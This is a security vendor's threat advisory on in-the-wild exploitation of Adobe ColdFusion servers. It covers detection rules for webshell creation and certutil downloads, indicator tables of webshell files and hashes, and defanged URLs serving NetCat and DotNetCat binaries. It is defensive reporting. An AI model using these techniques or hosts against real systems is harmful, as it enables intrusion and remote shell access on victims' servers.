Rapid7’s Threat Intelligence and Detection Engineering team has identified active exploitation of Adobe ColdFusion in multiple customer environments. The observed activity dates back to January 2023 and has not been tied back to a specific CVE at this time. IOCs are included below.
Rapid7 has existing detection rules within InsightIDR that have identified this activity and have created additional rules based upon this observed behavior. We have also observed the compromised website, ooshirts[.]com, being used in other attacks dating back to March 2022.
The earliest time frame of compromise identified thus far occurred in early January 2023. Rapid7 discovered evidence indicating that a malicious actor dropped webshells using an encoded PowerShell command. Process start data indicates that ColdFusion 2018 is spawning malicious commands.
Example base64 encoded command executed by malicious actor through ColdFusion:
Decoded:
In our current investigations, previously existing and new detections have been observed triggering post exploitation across Rapid7 InsightIDR and Managed Detection & Response (MDR) customers:
Webshell - Possible ColdFusion Webshell In Command Line
This detection identifies common ColdFusion tags being passed in the command line. This technique is used by malicious actors when redirecting strings into files when creating webshells.
Attacker Technique - CertUtil With URLCache Flag
This detection identifies the use of the ‘certutil.exe’ binary with the ‘-urlcache’ flag being passed to it. This technique is used by malicious actors to retrieve files hosted on a remote web server and write them to disk.
This technique has been observed by malicious actors redirecting strings into files while creating webshells. Look for *.cfm files in ColdFusion webroots containing the following ColdFusion tags:
Review process start logs for any abnormal child processes of ColdFusion Server
File items:
Type | Value | Notes |
---|---|---|
Filename | WOW.TXT | ColdFusion WebShell |
Filename | wow.txt | ColdFusion WebShell |
Filename | www.txt | ColdFusion WebShell |
Filename | www.cfm | ColdFusion WebShell |
Filename | wow1.cfm | ColdFusion WebShell |
Filename | zzz.txt | ColdFusion WebShell |
Filename | dncat.exe | DotNetCat |
Filename | nc.exe | NetCat |
SHA-256 | e77d6a10370db19b97cacaeb6662ba79f34087d6eaa46f997ea4956e2ad2f245 | ColdFusion WebShell |
SHA-256 | 2482ab79ecb52e1c820ead170474914761358d3cee16e3377fd6e031d3e6cc25 | ColdFusion WebShell |
SHA-256 | 03b06d600fae4f27f6a008a052ea6ee4274652ab0d0921f97cfa222870b1ddc3 | ColdFusion WebShell |
SHA-256 | be56f5ed8e577e47fef4e0a287051718599ca040c98b6b107c403b3c9d3ee148 | ColdFusion WebShell |
MD5 | 1edf1d653deb9001565b5eff3e50824a | DotNetCat |
SHA-1 | 5d95fb365b9d0ceb568bb0c75cb1d70707723f27 | DotNetCat |
SHA-256 | 213079ef54d225c4ca75dd0d57c931bdc613e8c89a2d0dbff88be5b446d231f0 | DotNetCat |
MD5 | 470797a25a6b21d0a46f82968fd6a184 | NetCat |
SHA-1 | dac7867ee642a65262e153147552befb0b45b036 | NetCat |
SHA-256 | ce80b839411b1541d09b0ede82f1477b516da0c60760079f46ba4443e1a6f419 | NetCat |
Network-based indicators:
Type | Value | Notes |
---|---|---|
FQDN | www.av-iq[.]com | Legitimate Compromised Domain |
FQDN | www.ooshirts[.]com | Legitimate Compromised Domain |
URL | hXXps://www.av-iq[.]com/wow.txt | ColdFusion WebShell |
URL | hXXps://www.ooshirts[.]com/images/zzz.txt | ColdFusion WebShell |
URL | hXXps://www.ooshirts[.]com/images/dncat.exe | DotNetCat |
URL | hXXp://www.ooshirts[.]com/images/nc.exe | NetCat |
MITRE ATT&CK Tactic/Technique/Subtechniques
TA0042 Resource Development (tactic):
TA0001 Initial Access (tactic):
TA0002 Execution (tactic):
TA0003 Persistence (tactic):
TA0011 Command & Control (tactic):
While we have not tied this behavior back to exploitation of a specific CVE, Adobe released patches for known vulnerabilities in ColdFusion on March 14, 2023. At least one of the CVEs patched in version 16 (ColdFusion 2018) and version 6 (ColdFusion 2021) is known to be exploited in the wild. Rapid7’s vulnerability research team has successfully chained CVE-2023-26359 and CVE-2023-26360 for unauthenticated remote code execution; in-depth analysis and proof-of-concept code is available in AttackerKB here.
We strongly advise ColdFusion customers to update to the latest version to remediate known risk, regardless of whether the behavior we have detailed in this blog is related to recent vulnerabilities. We also advise customers to examine their environments for signs of compromise.
InsightVM and Nexpose customers are able to assess their exposure to known Adobe ColdFusion vulnerabilities via recurring vulnerability check coverage.
Eoin Miller contributed to this article.